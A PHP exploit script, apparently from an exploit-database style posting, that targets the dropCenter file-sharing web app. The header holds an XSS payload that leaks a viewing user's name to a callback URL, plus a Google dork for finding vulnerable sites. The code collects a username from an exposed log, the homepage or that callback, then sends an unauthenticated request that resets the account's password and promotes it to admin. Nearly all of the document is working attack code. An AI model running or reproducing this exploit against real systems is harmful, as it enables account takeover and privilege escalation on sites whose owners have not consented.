XSS + privilege escalation
<?php | |
# Exploit Title: dropCenter (all versions): unauthenticated privilege escalation / password reset
# Against the latest version (after 2013-08-20) the event log may no longer be readable; in that case use the stored (permanent) XSS below. The `error` parameter is reflected into inline JavaScript, and the payload makes the browser of whoever views the page leak the username from the saveSettings form action to this script via its ?user= parameter:
# | |
# - Encoded URL : http://localhost/dropCenter/index.php?error=%22%29%3B%24%28document%29.ready%28function%28%29%7B%24%28%27body%27%29.append%28%27%3Cimg+src%3D%22http%3A%2F%2Flocalhost%2Fdropcenter_exploit.php%3Fuser%3D%27%2B%24%28%27form%5Baction%5E%3D%22php%2Faction.php%3Faction%3DsaveSettings%22%5D%27%29.attr%28%27action%27%29.match%28%2Fuser%3D%28.%2A%29%2F%29%5B1%5D%2B%27%22%2F%3E%27%29%7D%29%3Bfunction+test%28%29%7B%7Dtest%28%22 | |
# | |
# - Decoded URL : http://localhost/dropCenter/index.php?error=");$(document).ready(function(){$('body').append('<img src="http://localhost/dropcenter_exploit.php?user='+$('form[action^="php/action.php?action=saveSettings"]').attr('action').match(/user=(.*)/)[1]+'"/>')});function test(){}test(" | |
# | |
# Date: 2013-08-02 | |
# Author: leviathan | |
# Vendor or Software Link: http://projet.idleman.fr/dropcenter/ | |
# Version: 1.4 Beta and 2 Beta | |
# Category:: webapps | |
# Google dork: DropCenter V1.4 (Beta) par la DropTeam | DropCenter V2 (Beta) par la DropTeam | |
# Tested on: GNU/Linux with 1.4 Beta and 2 Beta | |
# Demo site: | |
// --- Target configuration ---------------------------------------------------
// Scheme and host of the vulnerable dropCenter instance (no trailing slash).
$base_url = 'http://localhost';
// Path under which dropCenter is installed (leading slash, no trailing slash).
$url_folder = '/dropCenter';
// Password that will be written into the victim's account.
$new_pass = 'my-new-password';
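// Find a username whose password we will overwrite. The first name found is
// returned; the original author expects that one to be an administrator.

/**
 * Pull the first username out of the .event.dc log body.
 *
 * The log is one JSON object per line; only objects with a string "user"
 * member are considered, and lines that do not decode are skipped.
 *
 * @param string $log raw body of uploads/.dc/.event.dc
 * @return string|null
 */
function firstUserFromEventLog($log)
{
    foreach (explode("\n", $log) as $line) {
        $event = json_decode($line);
        if ($event instanceof stdClass && isset($event->user) && is_string($event->user)) {
            return $event->user;
        }
    }
    return null;
}

/**
 * Scrape the first editUser('<name>') call out of the homepage HTML.
 * Line breaks are stripped first so a call split across lines still matches.
 *
 * @param string $html homepage body
 * @return string|null
 */
function firstUserFromHomepage($html)
{
    $flat = str_replace(array("\n", "\r"), '', $html);
    if (preg_match('/editUser\(\'([a-zA-Z0-9]+)\'\)/', $flat, $m) === 1) {
        return $m[1];
    }
    return null;
}

/**
 * Discover a username on the target dropCenter instance.
 *
 * Sources are tried in this order:
 *   1. uploads/.dc/.event.dc - a per-line JSON event log that older versions
 *      leave readable; the first event with a "user" member wins.
 *   2. index.php, scraped for the first editUser('<name>') call.
 *   3. This script's own ?user= query parameter, which is how the stored-XSS
 *      payload in the file header hands over a username it harvested from the
 *      saveSettings form action of whoever viewed the page.
 *
 * Source 3 is validated against the same alphabet the homepage scrape accepts,
 * because the value is later concatenated into a URL and echoed back.
 *
 * @param string   $base_url   scheme and host of the target, e.g. http://localhost
 * @param string   $url_folder path of the dropCenter install, e.g. /dropCenter
 * @param resource $curl       cURL handle with CURLOPT_RETURNTRANSFER enabled
 * @return string|null the username, or null when the log/homepage yield nothing
 */
function getUser($base_url, $url_folder, $curl)
{
    $target = $base_url.$url_folder;

    // Source 1: the event log.
    curl_setopt($curl, CURLOPT_URL, $target.'/uploads/.dc/.event.dc');
    $response = curl_exec($curl);
    $status = (int) curl_getinfo($curl, CURLINFO_HTTP_CODE);
    if ($status === 200 && is_string($response) && $response !== '') {
        return firstUserFromEventLog($response);
    }

    // Source 2: the homepage (reached when the log is denied or empty).
    curl_setopt($curl, CURLOPT_URL, $target.'/index.php');
    $response = curl_exec($curl);
    if (!is_string($response) || $response === '') {
        return null;
    }
    $user = firstUserFromHomepage($response);
    if ($user !== null) {
        return $user;
    }

    // Source 3: handed to us by the XSS payload. Never trust it blindly: reject
    // anything that could smuggle extra URL parameters or markup into our output.
    if (isset($_GET['user'])) {
        $candidate = $_GET['user'];
        if (is_string($candidate) && preg_match('/^[a-zA-Z0-9]+$/', $candidate) === 1) {
            return $candidate;
        }
        die('invalid user');
    }
    die('no user');
}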
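// --- Take over the account --------------------------------------------------
$curl = curl_init();
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);

$user = getUser($base_url, $url_folder, $curl);
if ($user === null || $user === '') {
    die('no user getting');
}

// saveSettings is called here with no session or credentials at all, so an
// unauthenticated POST overwrites the victim's password and rank. The username
// may come from a scraped page or from ?user=, so URL-encode it rather than
// letting it append further query parameters.
curl_setopt($curl, CURLOPT_URL, $base_url.$url_folder.'/php/action.php?action=saveSettings&user='.rawurlencode($user));
curl_setopt($curl, CURLOPT_POST, true);
$post = array(
    // NOTE(review): the address below was masked by the gist renderer; set a real one before use.
    'mail'      => '[email protected]',
    'avatar'    => 'no-avatar',
    'notifMail' => null,
    'rank'      => 'admin',
    'lang'      => 'en - English',
    'password'  => $new_pass,
);
curl_setopt($curl, CURLOPT_POSTFIELDS, $post);
$response = curl_exec($curl);
curl_close($curl);

if (!is_string($response) || $response === '') {
    die('error while edit user');
}

// When this script is served over HTTP (it is the XSS callback target) its
// output lands in a browser, so escape server-controlled text there; on the
// CLI print it verbatim.
$show = function ($text) {
    if (PHP_SAPI === 'cli') {
        return $text;
    }
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
};

if ($response === '{"succes":true}') {
    echo "User : ".$show($user)." / Pass : ".$show($new_pass)."\n";
} else {
    echo $show($response);
}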